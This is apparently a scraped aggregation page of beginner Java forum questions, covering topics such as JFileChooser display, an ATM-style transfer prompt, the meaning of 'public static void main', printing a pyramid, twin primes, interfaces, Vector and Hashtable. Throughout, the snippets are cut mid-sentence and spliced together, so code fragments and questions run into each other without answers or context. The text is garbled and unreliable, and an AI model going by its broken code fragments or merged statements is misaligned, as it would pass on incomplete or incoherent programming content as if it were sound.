(ye world), again the first char is missing...readline Error Hi sir, please helpme with my code. Mycode does java - Java Beginners java Sir, My code is attached below... It shows the selected file from Jfilechooser... But we can see only a small portion... Can you help... JTextField("", 20); JLabel JLabel1 = new JLabel("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n java programming - Java Beginners much money would you like to transfer? ..."); state = TRANSFER...(); mScreen.setText("How much money would you like to take out...java programming heloo there, hopw all of u guys are fine my Java - Java Beginners Java Sir, My code is attached below.. I want to retrieve... in small size... CAn you help see tha retrive images in right side of the panel...); JLabel JLabel1 = new JLabel("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n TEXTURE FEATURES Main function.. - Java Beginners []) What does it mean...public - static - void - main -(String args[]) Can u plz explain Each n Every word... 1.String args[] DIFFERENCE... / package static: You need not have an instance of the class to access the method PYRAMID - Java Beginners : A (so it will display a Pyramid OR TRIANGLE) would you like to continue y or n: y Enter a character: B * * * * * * * * * * * * * * * would you...("would you like to Continue y or n:"); str=buff - Java Beginners java sir, there is few questions which i tried but did not get succeed in it...will you help me to overcome it? my quetion is two numbers... numbers and check whether they are twin prime.? Thank you very much for your interface - Java Beginners Interface meaning in java What is the meaning of Interface? and why we need to call java - Java Beginners Define what is Vector with an example?why it is used and where it is used Define HashTable ? how can we enter the Keys and Values in HashTable ? would u give...(System.in)); System.out.print("How many elements you want to enter to the hash Advertisements If you enjoyed this post then why not add us on Google+? Add us to your Circles
http://www.roseindia.net/tutorialhelp/comment/10204
CC-MAIN-2015-18
refinedweb
2,519
76.11
31 October 2012 08:33 [Source: ICIS news] SINGAPORE (ICIS)--?xml:namespace> “This is a regular turnaround,” the source said, adding that it will last for about five days. Haohua Yuhang has a total PVC capacity of 500,000 tonne/year, with 400,000 tonnes/year at Qinyang. The producer sold carbide-based PVC during the turnaround at yuan (CNY) 6,500/tonne ($1,042/tonne) EXW (ex-works) on 31 October, according to Chemease. The spot PVC prices in central The shutdown of the unit may not have any significant impact on the local PVC market because of end-users’ weak demand, a local PVC market player said. (
http://www.icis.com/Articles/2012/10/31/9609080/chinas-haohua-yuhang-chemical-shuts-pvc-unit-on-30.html
CC-MAIN-2014-49
refinedweb
109
60.65
How to Calculate the Return Measure in QuickBooks 2013 There are two basic ways that you can calculate a return by using Microsoft Excel. You cannot do this calculation by using QuickBooks 2013 alone. To calculate a rate of return with Microsoft Excel, you first enter the cash flows produced by the investment. Even if you’ve never used Excel before, you may be able to construct this; all you have to do is start Excel (the same way you start any other Windows program). Then you enter the cash flows shown for the building investment. Actually, you enter only the values shown in cells B2, B3, B4, B5, and so on, through cell B22. These values are the cash flow numbers calculated and summarized here: In case you are new to Excel, all you do to enter one of these values is click the box (technically called a cell) and then type the value. For example, to enter the initial investment required to buy the building — $65,000 — you click the B2 cell and then type –65000. After you type this number, press Enter. You enter each of the other net cash flow values in the same manner in order to make the rate of return calculations. After you provide the cash flow values of the investment, you tell Excel the rate of return that you want calculated. In Cell G4, for example, an internal rate of return is calculated. An internal rate of return (IRR) is the interest rate that the investment delivers. For example, a CD that pays an 11 percent interest rate pays an 11 percent internal rate of return. To calculate an internal rate of return, you enter an internal rate of return function formula into a worksheet cell. In the case of the worksheet shown, you click cell G4 and then type the following: =IRR(B2:B22,.1) If you’ve never seen an Excel function before, this probably looks like Greek. But all this function does is tell Excel to calculate the internal rate of return for the cash flows stored in the range, or block of cells, that goes from cell B2 to cell B22. The .1 is an initial guess about the IRR; you provide that value so that Excel has a starting point for calculating the return. The office building cash flows, it turns out, produce an internal rate of return equal to 11 percent. This means that essentially, the office building delivers an 11 percent interest rate annually on the amounts invested in the office building. Another common rate of return measure is something called a net present value, which essentially specifies by what dollar amount the rate of return on a business exceeds a benchmark rate of return. For example, the worksheet shows the net present value equal to $9,822.37. In other words, this investment exceeds a benchmark rate of return by $9, 822.37. You can’t see it — it’s buried in the formula — but the benchmark rate of return equals 10 percent. So this rate of return essentially is $9,823.37 better than a 10 percent rate of return. To calculate the net present value by using Excel, you use another function. In the case of the worksheet shown, for example, you click cell G6 and type the following formula: =NPV(0.1,B3:B22)+B2 This formula looks at the cash flows for years 1 through 20, discounts these cash flows by using a 10 percent rate of return, and then compares these discounted cash flows with the initial investment amount, which is the value stored in cell B2. This all may sound a bit tricky, but essentially, this is what’s going on: The net present value formula looks at the cash flows stored in the worksheet and calculates the present value amount by which these cash flows exceed a 10 percent rate of return. The discount rate equals the rate of return that you expect on your capital investments. The discount rate is the rate at which you can reinvest any money you get from the capital investment’s cash flows. An important thing to know about pre-tax cash flows and returns versus after-tax cash flows and returns: Make sure that you’re using apples-to-apples comparisons. It’s often fine to work with pre-tax cash flows; just make sure that you’re comparing pre-tax cash flows with other pre-tax cash flows. You don’t want to compare pre-tax returns with after-tax returns. That’s an apples-to-oranges comparison. Predictably, it doesn’t work.
http://www.dummies.com/how-to/content/how-to-calculate-the-return-measure-in-quickbooks-.html
CC-MAIN-2014-15
refinedweb
774
68.7
Hi everyone. I am working on a project which has to change the value of a variable in the executable. Specifically, writing this program: int a = -1; int b = 3; int c = a + b; I have to go into the executable and change the value of "a" into the executable. Let me not extend this too much, and show you what i have done. At this moment I do not know why this is not working. I am trying to make sure that I am looking at the right place before I try to change the value. Thanks for any help you can give me. #include<iostream.h> #include<fstream> #include<stdio.h> #include<string> using namespace std; int main() { ifstream myFile; ofstream fout; char temp1; myFile.open("C:/Documents and Settings/Angel/Desktop/Virus/Hex/Debug/Hex.exe"); if ( !myFile ) //(myFile.is_open()) { cout << "File could not be opened.\n"; myFile.close(); } else { myFile.seekg(0x0000158B); //Seeks the positon of variable a in the binary file / executable. myFile.read(temp1,1); cout << "Value is " << temp1 << endl; myFile.close(); } return 0; } << moderator edit: added [co[u][/u]de][/co[u][/u]de] tags >>
https://www.daniweb.com/programming/software-development/threads/34974/reading-writing-to-executable
CC-MAIN-2018-05
refinedweb
192
68.36
A LINQ Tutorial As noted in numerous other postings, I’m convinced that LINQ is an essential aspect of serious Windows Phone (or virtually any .NET) programming. One of the great tools to come along for learning and working with LINQ is LinqPad, created by Joseph Albahari. In my forthcoming book Programming Reactive Extensions and Linq we use LinqPad for virtually all the exercises, as I do for many example postings here. It is important to be able to translate form LinqPad (which strips down a program to its essentials) to Visual Studio, where you will almost certainly be doing the bulk of your serious programming. In this posting we’ll take a LINQ query, examine it in LinqPad and then migrate it to Visual Studio. Along the way we’ll look at how you can interact with a database file in LINQ and how you can set the datacontext for a LINQ to SQL query. Northwind To begin, download the Northwind database from Microsoft, and place it in a known location. Open LinqPad and click on Add Connection in the upper left, as shown in the figure. Click Next and then choose AttachDatabase file and browse to the file you just saved. Leave the other settings as-is and click OK. Notice that the Database setting (at the top of the main window) now indicates Northwind.mdf and the location of your file. You are ready to query against that database. A Simple Query With A Filter To begin, let’s do a simple query in which we will find the ContactID, CompanyName and ContactName for every Customer in London, DataContext dataContext = this; var query = from Contact in dataContext.GetTable<Contacts>() where Contact.City == "London" select new { Contact.ContactID, Contact.CompanyName, Contact.ContactName }; query.Dump(); Running this query returns the appropriate records in the Results Window. Dump() is a LinqPad method that displays very much as Console.WriteLine does. Skip and Take We can narrow these results with a couple standard LINQ operators: - Skip - Take These do pretty much what you’d expect: skip skips over the given number of records, and then take puts the given number of records into the IEnumerable. We can append these to the query and then show the results. DataContext dataContext = this; var query = from Contact in dataContext.GetTable<Contacts>() where Contact.City == "London" select new { Contact.ContactID, Contact.CompanyName, Contact.ContactName }; var afterSkipping = query.Skip(2); var takingTwo = afterSkipping.Take(2); takingTwo.Dump(); The output of this, as you would expect, is the third and fourth record, Notice that by using LinqPad all the peripheral code involved with setting up the DataContext, managing the objects associated with the query and so forth are eliminated or simplified, allowing you to focus on the LINQ statements. That’s all well and good, but how do you translate this back into a C# program? Migrating To Visual Studio To move this program into Visual Studio, open a new Console application. Library and Includes We’re going to be working with LINQ to SQL so be sure to add the library for System.Data.LINQ and add the following two include statements to each file, using System.Data.Linq; using System.Data.Linq.Mapping; Map the table to an Entity Class The very first job is to map the database to an entity; that is, to a class that will represent the table. To do so, create a new class named Customer and adorn the class and its properties with attributes [Table( Name = "Customers" )] class Customer { [Column( IsPrimaryKey = true )] public string CustomerID { get; set; } [Column( Name = "ContactName" )] public string Contact { get; set; } [Column( Name = "CompanyName" )] public string Company { get; set; } [Column] public string City { get; set; } } You are free to add properties that do not have the Column attribute and which do not map to columns in the database; thus allowing your objects to extend the values in the database. Notice the Table attribute has the Name= attribute, allowing your class to have a different name than the table. Similarly, the second and third columns use the Name= attribute to allow a property to map to a column with a different name. Finally, the first property, CustomerID, has the IsPrimaryKey attribute set to true; as must be done for at least one property in every LINQ to SQL class. Create The DataContext You are ready to create the all-important DataContext object and then to use that to query the database and to populate instances of your class. Open Program.cs and in the constructor, create the DataContext, passing in the path to the Northwind database file. On my machine that looks like this: DataContext db = new DataContext( @"L:\Downloads\Northwind\Northwind.mdf" ); The DataContext encapsulates an ADO.Net Connection object that is initialized with the connection string that you supply in the constructor. This and all of ADO.Net is quite well hidden by LinqToSql Query The Database Use that database to retrieve a strongly-typed instance of Table<Customer> (the type you created earlier in Customer.cs). Then create your query statement, extracting it directly from LinqPad, Table<Customer> Customers = db.GetTable<Customer>(); var CustomerQuery = from c in Customers where c.City == "London" select new { c.CustomerID, c.Company, c.Contact }; All that’s left is to iterate through the results and to show the output, in this case, using Console.WriteLine. foreach (var cust in CustomerQuery) { Console.WriteLine( "id = {0}, Company = {1}, Contact = {2}", cust.CustomerID, cust.Company, cust.Contact ); } Here’s the output, id = AROUT, Company = Around the Horn, Contact = Thomas Hardy id = BSBEV, Company = B's Beverages, Contact = Victoria Ashworth id = CONSH, Company = Consolidated Holdings, Contact = Elizabeth Brown id = EASTC, Company = Eastern Connection, Contact = Ann Devon id = NORTS, Company = North/South, Contact = Simon Crowther id = SEVES, Company = Seven Seas Imports, Contact = Hari Kumar 21 Responses to LINQ Pad vs. Visual Studio for Learning LINQ Pingback: LINQ Pad vs. Visual Studio for Learning LINQ – Pingback: The Morning Brew - Chris Alcock » The Morning Brew #898
http://jesseliberty.com/2011/07/19/linq-pad-vs-visual-studio-for-learning-linq/
CC-MAIN-2021-17
refinedweb
1,002
53.1
tabPanel: selected tab is lostAlan Mar 20, 2007 10:01 AM I am using a tabPanel to organize sets of functions. Each tab will provide a set of functions/links per user role. When navigation (clicking a link) within a tab the currently selected tab is lost and the browser will go back to the first tab. The user doesn't want to click again on the tab he/she is working on. The server should remember that state. How can I do this? Right now I am using request parameters but this not very clean. Further Seam and Facelets are used. <rich:tabPanel <rich:tab Test Tab.. </rich:tab> <rich:tab <s:link <f:param </s:link> <s:link <f:param </s:link> <ui:define </rich:tab> </rich:tabPanel> In this case both views persons and companies use the above template and define their onwn body content. I would like to use some sort of valueChangeListener that informs me when tabs are changed, store the active tab in a managed bean and use that in the selectedTab attribute. But somehow I don't get the valueChangeListener nor a backing bean to work. 1. Re: tabPanel: selected tab is lostAndrew Wheeler Mar 26, 2007 7:52 PM (in response to Alan) I have the same problem. I have tabs with dataTables, which when selected edit the item in a nested conversation. When the nested conversation "pops" the tab context is back at the first tab. I took a slightly different approach using a backing bean. I tried using the valueChangeListener on the tabPanel but that does not give new or old values of the selected tab. Perhaps the Richfaces guys could look at implementing the listener so that the old value is the previous tab and the new value is the newly selected tab. Anyway, I tried a backing bean which looks like: @Scope(ScopeType.CONVERSATION) @Name("richFacesTabSelection") public class RichFacesTabSelection implements IRichFacesTabSelection,Serializable { private static final long serialVersionUID = 5709694844281585638L; private String selectedTab; public void tabSelectedActionListener(ActionEvent event) { this.setSelectedTab(event.getComponent().getId()); } public String getSelectedTab() { return selectedTab; } public void setSelectedTab(String selectedTab) { this.selectedTab = selectedTab; } } The tab looks like: <rich:tabPanel <rich:tab . . </rich:tabPanel> Ideally I'd like the backing bean to be at page scope, but it does not retain its state when a nested conversation is popped. You'll probably run into trouble with this bean if there are more than one tabPanels in the same conversation. Perhaps the bean could be modified to put the selectedTab in the request values as per seam's datamodelselection. It would be nice if this issue is resolved by the standard richfaces tabpanel. 2. Re: tabPanel: selected tab is lostM Bol Mar 27, 2007 8:00 AM (in response to Alan) I am having same problem. I tought that tabPanel remembers its selected tab? 3. Re: tabPanel: selected tab is lostNick Belaevski Mar 28, 2007 11:03 AM (in response to Alan) Hello all! I've checked tabPanelDemo application today. Both valueChange listeners work fine: one defined as component attribute, the other defined as nested tag. You can see them at action in the demo application. The new value obtained from getNewValue() of ValueChangeEvent corresponds to concrete tab name and can then be set as "currentTab" property of tabPanel to open that concrete tab.
https://developer.jboss.org/thread/6092
CC-MAIN-2018-30
refinedweb
555
55.64
From a performance point of view (time or memory) is it better to do: import pandas as pd from pandas import DataFrame, TimeSeries def foo(bar): from numpy import array This is micro-optimising, and you should not worry about this. Modules are loaded once per Python process. All code that then imports only need to bind a name to the module or objects defined in the module. That binding is extremely cheap. Moreover, the top-level code in your module only runs once too, so the binding takes place just once. An import in a function does the binding each time the function is run, but again, this is so cheap as to be negligible. Importing in a function makes a difference for two reasons: it won't put that name in the global namespace for the module (so no namespace pollution), and because the name is now local, using that name is slightly faster than using a global. If you want to improve performance, focus on code that is being repeated many, many times. Importing is not it.
https://codedump.io/share/W0aeZtHFxlUL/1/most-performant-way-to-do-imports
CC-MAIN-2018-13
refinedweb
180
68.5
To. First it was only “cuts and gravy” varieties from a single manufacturer, then late last week products from three more facilities were suddenly added to the recall, including one variety of dry cat food. And now the FDA not only admits that the recall could widen further, it has also revealed that the melamine-tainted wheat gluten was indeed delivered to processing plants that make human food as well. Still… “To date, we have nothing that indicates it’s gone into human food,” said Dorothy Miller, director of the FDA’s Office of Emergency Operations . “We have a bit more investigation to do.” They certainly do. But. Wheat gluten is not an obscure feed stock, but rather a common ingredient widely used in a large number of processed foods and baked goods. And while federal regulations distinguish between “food grade” and “feed grade,” the overwhelming majority of wheat gluten distributed in this country is sold as the former.. The FDA always knew the tainted wheat gluten was sold as “food grade,” but never offered this information to the public. And even now they continue to obfuscate the matter. According to import records, the wheat gluten was shipped to the United States from Nov. 3, 2006 to Jan. 23 of this year and contained “minimal labeling” to indicate whether it was intended for humans or animals. The FDA officials who provided this information either don’t understand our nation’s import regulations, or are intentionally misleading reporters with this “minimal labeling” canard. For as Steve Pickman, VP of Corporate Relations for MGP Ingredients explains, all “edible” imported wheat gluten is meant for both human and animal consumption: Regarding imported wheat gluten, U.S. Customs allows for two different gluten classifications to come into the country, “Edible” and “Non-edible.” Non-edible product is not considered destined for the food/pet food markets. Product used in industrial, or non-ingestible, applications would be considered non-edible. Both food and pet food products are under the jurisdiction of the FDA. These products must adhere to the same standards. Non-edible gluten would be allowed into applications where no food/ pet food products are made. Over 70-percent of the wheat gluten consumed in the U.S. is imported, mostly from Asia, and the remaining 30-percent produced domestically is almost entirely “food grade.” There is no separate channel for “food grade” vs “feed grade” wheat gluten, so the FDA should have understood that the Chinese imports involved were always graded for human consumption. Given the nature of the industry and the scope of the recall thus far — over 60 million units from four manufacturers at five separate facilities — and the three month period of time over which the suspect wheat gluten was imported, it was perfectly reasonable to assume that at least some of the tainted product would make its way to facilities that process human food, and then onto store shelves and into our kitchens and restaurants. It has been at least a month since the FDA was first made aware of a potentially widespread food supply contamination, and yet they continue to hold their information close to their vest as they do “a bit more investigation.” Meanwhile, it only took Nestle Purina four hours to discern that it had a contamination problem after the FDA announced on March 30 that the culprit was tainted wheat gluten from a Chinese supplier — information the FDA apparently had since at least March 8. The American people have the right to know the facts in a timely manner — all the facts — including the identity of the unnamed distributor mentioned in ChemNutra’s press release, the facilities suspected of receiving contaminated wheat gluten, and a complete timeline detailing what was known, and when. When it comes to issues of public health and safety the best way to avoid undue speculation and give consumers the information they need to properly protect themselves is to be completely and openly honest. ChemNutra was notified that its wheat gluten was killing animals back on March 8. We need to know why contaminated product was still on the shelves as late as March 30. But there is a larger issue here: the failure of the FDA to keep up with the challenges of safeguarding a food supply that has become so deeply integrated into the global economy. Perhaps us humans dodged a bullet, and the contamination was indeed limited to pet food. But if it had been the other way around, how would we know? Renal failure can be slow and progressive, the symptoms sometimes not manifesting themselves until months after the initial toxic exposure. Our dead and dying pets may very well have saved thousands of human lives, warning us of the poisoned gluten before it inevitably reached the dinner table. The FDA failed to protect these dogs and cats, but it just as easily could have been people who paid the price. It is time to rethink the laws governing the FDA, and reevaluate the officers running it. As Mike Brown proved at FEMA, it is best to have government agencies run by people who actually believe in government. Spencer spews: From a February 26 item on msnbc.com: Safety tests for U.S.-produced food have dropped nearly 75 percent, from 9,748 in 2003 to 2,455 last year, according to the agency’s own statistics. msnbc.com article JESUS GOMEZ spews: Goldy, by God, your best work ever. Congrats, award winning. To protect international business cartels, this administration would lie to the hilt…..must send these people to jail and the unemployment lines…. Incompetent, lying, reckless….stupid….FDA/FEMA….all shitheads installed by Bush Criminal Conspiracy….to the barricades….OUR FREEDOM, OUR DEMOCRACY, OUR LIVES at stake. Desertthorn spews: Great report. Thanks Goldy David spews: Years ago, I bought a book titled “American Chamber of Horrors” thinking it was an anthology of American short story writers. It turned out to be much scarier. It was a collection of data and court cases to help people realize that the 1906 Pure Food and Drugs Act needed a little more teeth. From lead, thallium and arsenic in hair removers to the women blinded or killed by cosmetics to the apple orchard workers dying of arsenic poisioning to the tales of what really was in ‘sweet creamery butter’ to the businessmen stating: “Oh, I didn’t know that arsenic/thallium/lead/mercury would be bad for people.” and getting off time and again in court cases just to create a new product with the same ingredients made it an interesting read. The FDA was created to protect U.S. citizens. By removing their enforcement capabilities and lowering drug testing requirements all we do is open the door for things like the wheat gluten problem to happen. Sandro spews: Thank you, Sir. After that awful AP headline, I’m glad responsible journalists such as yourself are raising important questions and getting to the real issues behind this fiasco. DeeAnn spews: Back in 2004 because of one cow in the state of Washington infected with BSE, American companies could no longer export cosmetics to China. FOR IMMEDIATE RELEASE P04-46 April 21, 2004 Statement on Cosmetic Exports to China The Food and Drug Administration today announced a successful resolution of an issue arising out of the January, 2004 decision by the Chinese government to suspend on public health grounds the importation of United States cosmetics. The Chinese measure, which was issued after the discovery in the state of Washington of a cow infected with BSE, the so-called Mad Cow Disease, has been estimated by the Department of Commerce to result in the potential loss of $100 million worth of cosmetic exports a year. ——————————————————————————– This is crazy. Why is our Goverment in bed with China? Why can’t we do the same with their dangerous business practices? DeeAnn spews: Thought you may want to know the horrid stuff China has been importing into our country. Not everything gets inspected –so this is only what the FDA has caught. It’s disgusting; I had no idea; bet you did not either. Our food, pet food, cosmetics, hair dye, lotions, human medications, pet medications, vitamins, raw materials, juices, fruits, etc. is being severly compromised to the inth degree. Breaded shrimp, blueberries, dates, fish, mushrooms, meat, noodles, garlic, pumpkins seeds, honey etc. you name it. It’s all here on the FDA website. Open up the links and prepare to get mad as hell, and get informed. I am not against the people in China–but I am against what is happening here in the U.S.A. What gets inspected coming into this country is a tiny amount–a troubling issue. Filth from Nov 06 Filth from Sep 06 Filth from Feb 07 Reason: DISEASED Section: 402(a)(5), 801(a)(3); ADULTERATION Charge: The food appears to be, in whole or in part, the product of a diseased animal or of an animal which has died otherwise than by slaughter. Reason: BUTTER Section: 402(e), 801(a)(3); ADULTERATION Charge: The article appears to be oleo/margarine or butter with raw materials consisting in whole or in part of a filthy, putrid, or decomposed substance or the article is otherwise be unfit for food. Reason: CONCEALED Section: 402(b)(3), 801(a)(3); ADULTERATION Charge: It appears to be food which has damage or inferiority concealed in any manner. Reason: CONTAINER Section: 601(d), 801(a)(3); ADULTERATION Charge: The container appears to be composed, in whole or in part, of a poisonous or deleterious substance which may render the contents injurious to health. Reason: COSM COLOR Section: 601(e), 801(a)(3); ADULTERATION Charge: The cosmetic appears to not be a hair dye, and is, bears, or contains a color additive which is unsafe within the meaning of section 721(a). Reason: COSMETIC Section: 601(c), 801(a)(3); Adulteration Charge: The article appears to be an ingredient in a cosmetic product and may have been prepared packed or held under insanitary conditions whereby it may have become contaminated with filth or rendered injurious to health. Reason: DANGEROUS Section: 502(j), 801(a)(3); MISBRANDING Charge: The article appears to be dangerous to health when used in the dosage or manner, or with the frequency or duration, prescribed, recommended, or suggested in the labeling thereof. Reason: DE/RX KIT Section: 801(d)(1),(2); IMPORTATION RESTRICTED Charge: The article appears to be a combination medical device/prescription drug kit for which the prescription drug component was manufactured in the U.S., is offered for import by other than the manufacturer, and reimportation Reason: DIOXIN Section: 402(a)(1),402(a)(2)(A),402(a)(2)(C)(i),801(a)(3)-Adulterated Charge: The article appears to bear or contain dioxins and/or PCB compounds, poisonous or deleterious substances and/or unapproved food additives which may render it injurious to health. Reason: DR QUALITY Section: 501(b), 801(a)(3); ADULTERATION Charge: The article appears to be represented as a drug the name of which is recognized in an official compendium and its strength appears to differ from or its quality or purity appear to fall below the standards set forth in such Reason: EXCESS SUL Section: 402(a)(1), 801(a)(3); ADULTERATION Charge: The article appears to contain excessive sulfites, a poisonous and deleterious substance which may render it injurious to health. Reason: FALSE Section: 403(a)(1), 801(a)(3); MISBRANDING Charge: the labeling appears to be false and misleading in any particular. Reason: FALSECAT Section: 403(t), 801(a)(3) Charge: The article is subject to refusal of admission pursuant to section 801(a)(3) in that it appears to be misbranded because it purports to be or is represented as catfish but is not a fish classified within the family Reason: FEED & NAD Section: 501(a)(6), 801(a)(3); ADULTERATION Charge: The article appears to be an animal feed bearing or containing a new animal drug, and such animal feed is unsafe within the meaning of section 512. Reason: FILTH Section: 601(b), 801(a)(3); ADULTERATION Charge: The cosmetic appears to consist in whole or in part of any filthy, putrid, or decomposed substance. Reason: FILTHY Section: 402(a)(3), 801(a)(3); ADULTERATION Charge: The article appears to consist in whole or in part of a filthy, putrid, or decomposed substance or be otherwise unfit for food. Reason: WARNINGS Section: 502(f)(2), 801(a)(3); MISBRANDING Charge: It appears to lack adequate warning against use in a pathological condition or by children where it may be dangerous to health or against an unsafe dose, method, administering duration, application, in manner/form, to Kiroking spews: Ships are loaded with empty containers being shipped BACK to china for Refill. Ocean freight is soooo cheap going to china. Anyone wanna guess why? Americans consume more imports than they export. It Starts at home. Buy american. Make your own Dog Food. Grow your own garden. Raise your milk cows, beef cattle, chickens, and pigs. Sew your own clothes…… Shop local, but shop american made. This is always where the door meets the jamb, the imports are cheaper. Give up a little and gain for the good of mankind….. gretchen spews: Yikes! I guess I’m glad I’m on the Atkins diet and my pet was buried last year. Thanks for the great analysis. Enoch Root spews: The real enemy here is not the FDA (though they certainly deserve the slings and arrows). The real enemy here is a food economy that is horridly wasteful, and which is basically a setup for a cascading ecological disaster. Read yer Wendell Berry. The industrialization of agriculture is broken, and even an effective FDA can’t fix it. righton spews: goldy, ok w/ your analsysi here. We conservatives want to conserve our own lives… nit though on last line or so….you said “it is best to have government agencies run by people who actually believe in government” –bad point to a decent post…if that notion were true then KCRE or our transport agencies would be well run too. Roger Rabbit spews: What kind of low-life bullies kidnap and beat up women and children? Republicans, that’s who: “By ANTHONY MITCHELL “AP “NAIROBI, Kenya (April 3) – CIA and FBI agents … have been interrogating terrorism suspects …. … Ethiopia … is a country with a long history of human rights abuses. … “U.S. government officials contacted by AP acknowledged questioning prisoners in Ethiopia. But they said American agents were … fully justified in their actions …. The prisoners were never in American custody, said an FBI spokesman, Richard Kolko, who denied the agency would support or be party to illegal arrests. … “But some U.S. allies have expressed consternation at the transfers to the prisons. One Western diplomat in Nairobi … said he sees the United States as playing a guiding role in the operation. “John Sifton, a Human Rights Watch expert on counter-terrorism, … said in an e-mail that the United States has acted as ‘ringleader’ in what he labeled a ‘decentralized,. ‘It was a nightmare from start to finish,’ Kamilya Mohammedi Tuweni, a 42-year-old mother of three … told AP … after her release … on March 24 from … 2 1/2 months in detention without charge. … She was … interviewed, fingerprinted and photographed by a U.S. agent, she said. Tuweni … said she was arrested while on a business trip to Kenya and had never been to Somalia or had any links to that country. …. … “‘We. “‘She is exhausted, her face is yellow and she’s lost about 10 kilograms (22 pounds),’ her mother … wrote on a Web site she set up to help secure her daughter’s release. ‘She was beaten with a stick when she demanded to go to the toilet.’ The mother spoke briefly by telephone with AP ….. “The transfer from Kenya to Somalia, and eventually to Ethiopia, of a 24-year-old U.S. citizen, Amir Mohamed Meshal, raised disquiet among FBI officers and the State Department. … U.S. diplomats on Feb. 27 formally protested to Kenyan authorities about Meshal’s transfer and then spent three weeks trying to gain access to him in Ethiopia, said Tom Casey, deputy spokesman for the State Department. … An FBI memo read to AP by a U.S. official in Washington … quoted an agent who interrogated Meshal as saying the agent was ‘disgusted’ by Meshal’s deportation to Somalia by Kenya. The unidentified agent said he was told by U.S. consular staff that the deportation was illegal. “‘My personal opinion was that … the precedent of ‘deporting’ U.S. citizens to dangerous situations when there is no reason to do so was a bad one,’ the official quoted the memo as saying. “Like Benaouda, Meshal was arrested fleeing Somalia. … Meshal’s parents insist he is innocent and called on the U.S. government to win his release. … ‘Clearly. ‘Our. … Kolko, the FBI spokesman, … said … ‘We do not support or participate in any system that illegally detains foreign fighters or terror suspects, including women and children.’ “Paul Gimigliano, a CIA spokesman, declined to discuss details of any such interviews. He said, however: ‘To fight terror, CIA acts boldly and lawfully, alone and with partners, just as the American people expect us to.’ “One of the U.S. officials said the FBI has had access in Ethiopia to several dozen individuals … as part of its investigations. …. … Kenyan government spokesman Alfred Mutua insisted no laws were broken …. Lawyers and human rights groups argue the covert transfers to Ethiopia violated international law. “‘Each of these governments has played a shameful role in mistreating people fleeing a war zone,’ said Georgette Gagnon, deputy Africa director of Human Rights Watch. ‘Kenya has secretly expelled people, the Ethiopians have caused dozens to disappear, and U.S. security agents have routinely interrogated people held incommunicado.’ Quoted under Fair Use; for complete story and/or copyright info, see Roger Rabbit Commentary: Click here for photo of Republican interrogating terrorism suspects: Roger Rabbit spews: McCain Wanted On Kerry’s ’04 Ticket There are reports today that Sen. John McCain approached Democratic presidential nominee John Kerry about joining the ticket. Roger Rabbit spews: Recurring reports of McCain overtures to Democrats about switching parties, together with a poor fund-raising showing, probably dooms McCain’s ’08 campaign. And the other GOP front-runner, Rudy Guilinia, is being dogged by his martial indiscretions and business associations with organized crime. This will throw the GOP race wide open and raise the chances of some rightwing nutbag making off with the nomination, setting the stage for the biggest Democratic landslide in history. Roger Rabbit spews: Man I’m going to enjoy this. =:) Roger Rabbit spews: I don’t let my veterinarian give me any drugs approved after Jan. 19, 2001. Roger Rabbit spews: . Roger Rabbit spews: And these Republican assholes don’t want you to know what hormones and chemicals are in the meat and milk supplies, either. Roger Rabbit spews: Give us another 4 years of GOP government and you’ll have Chinese-made wings falling off Boeing jetliners in flight. Yer Killin Me spews: Hiring people who hate and mistrust government to run the government is like hiring people who hate and mistrust children to raise your kids. Jim spews: This latest fiasco is 100% perfectly in line with Smirky McFlightsuit’s approach to ALL public agencies. Fox guarding the hen house is pretty mild to describe the abdication going on. Perhaps I have been watching the reruns of The Sopranos, but these evil people are nothing but RAT BASTARDS. May they all enjoy a nice warm afterlife. Roger Rabbit spews: Fired Prosecutor’s Replacement Lied About His Experience And Was Involved in GOP Voter Suppression Operations … he prosecuted 40 criminal cases while at Ft. Campbell … [b]ut Army authorities say …. ‘Just wanted to clarify, make sure you had an understanding that prosecuted means it’s a case he handled while he was there; it doesn’t mean that it went to trial necessarily,’ Beck said. ‘Prosecuted …. “On NBC’s ‘Meet the Press’ last Sunday, Sen. Orrin Hatch of Utah, a senior Republican on the Senate Judiciary Committee, hailed Griffin as ‘a person with prosecutorial experience who … the U.S. Attorney who was going to be removed said was his right-hand man and one of the best prosecutors he had.’ “… [H]owever, Cummins disputed Hatch’s characterization of the letter. ‘I don’t see … where I referred to him as my “right arm,”‘ Cummins said. ‘I don’t know where they are getting that.’ … Cummins noted that Hatch also made disparaging remarks about Carol Lam, the U.S. Attorney in San Diego who was … fired last year because the White House and Justice Department didn’t rate them highly on … an assessment of whether they were ‘loyal Bushies.’ “‘I imagine Senator Hatch will be very upset with the person or persons that fed him all the wrong information,’ Cummins said …. ‘Sounds like he was provided talking points by someone as reckless with the facts as other previous occurrences in this saga. I have lost count of the public statements they have made that are simply wrong, or … obviously deceptive. It smacks of desperation.’ … “In an earlier phone interview, Cummins told me he had no clear recollection of Griffin actually trying any case during his nine-month stint in Little Rock. ‘I honestly don’t remember,’ Cummins said. ‘He may have tried one or two but nothing jumps out at me.’ Cummins added that … ‘other people had to try his cases because he left.’ Griffin quit his job with … Cummins to … work … for the 2004 Bush-Cheney campaign. … “In December 2006, Griffin was named to replace Cummins, a Republican who was well-regarded for his fairness by both Republican and Democratic lawyers in Arkansas. … …. In the final report on the case, Barrett thanked Griffin ‘for helping in the early stages of the investigation.’ “Griffin’s résumé, however, paints a more substantial picture of his role, saying he ‘interviewed. “In September 1999, Griffin joined the Bush-Cheney campaign … handling … opposition research, digging up dirt on political opponents. He also worked as a legal adviser in the Florida recount battle …. “In 2001, Bush appointed Griffin as a special assistant to Michael Chertoff, assistant attorney general at the Justice Department’s criminal division. During five months on the job, Griffin ‘tracked’ issues for Chertoff, such as extradition and provisional arrest, according to Griffin’s résumé. Griffin then spent nine months … as a special assistant to U.S. Attorney Cummins before returning to the political world where he was named research director and deputy communication director for the 2004 Bush-Cheney campaign. “Griffin’s campaign initiatives included the use of a technique known as ‘c ‘caging’ African-Americans who lived in low-income areas or who were in the U.S. military. ‘C ‘advised President George W. Bush and Vice President Richard B. Cheney on political matters, organized and coordinated political support for the President’s agenda, including the nomination of Judge John Roberts to be Chief Justice of the Supreme Court.’ “Griffin’s brief White House service was interrupted in September 2005 when he reported for active duty as an attorney at Ft. Campbell, Kentucky. … ‘of Karl Rove playing any role in the decision to appoint Griffin,’ an e-mail by Gonzales’s chief of staff Kyle Sampson revealed that Griffin’s appointment was ‘important to Harriet, Karl, etc.,’ in a reference to then-White House counsel Harriet Miers and Karl Rove. … . “Griffin told the Arkansas Democrat 